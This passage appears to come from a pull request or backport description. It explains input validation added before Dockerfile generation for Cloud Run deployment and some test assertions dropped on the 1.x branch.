- **#1240** validates both values before the Dockerfile is written. The checks run before the temp directory is created, so a rejected invocation does not leave an empty `cloudrun_<timestamp>_*` directory behind, and `prepareDockerfile` now reads every value off the receiver rather than the package global, so the guard and the line it guards cannot come apart.

One adaptation: main's test sets `f.cloudRun.debugAPI` and expects `-include_debug_api` in the generated `CMD`. The debug API gate arrived in #1413, which is outside this range and not on 1.x, so those two assertions are dropped and the rest of the matrix is unchanged.
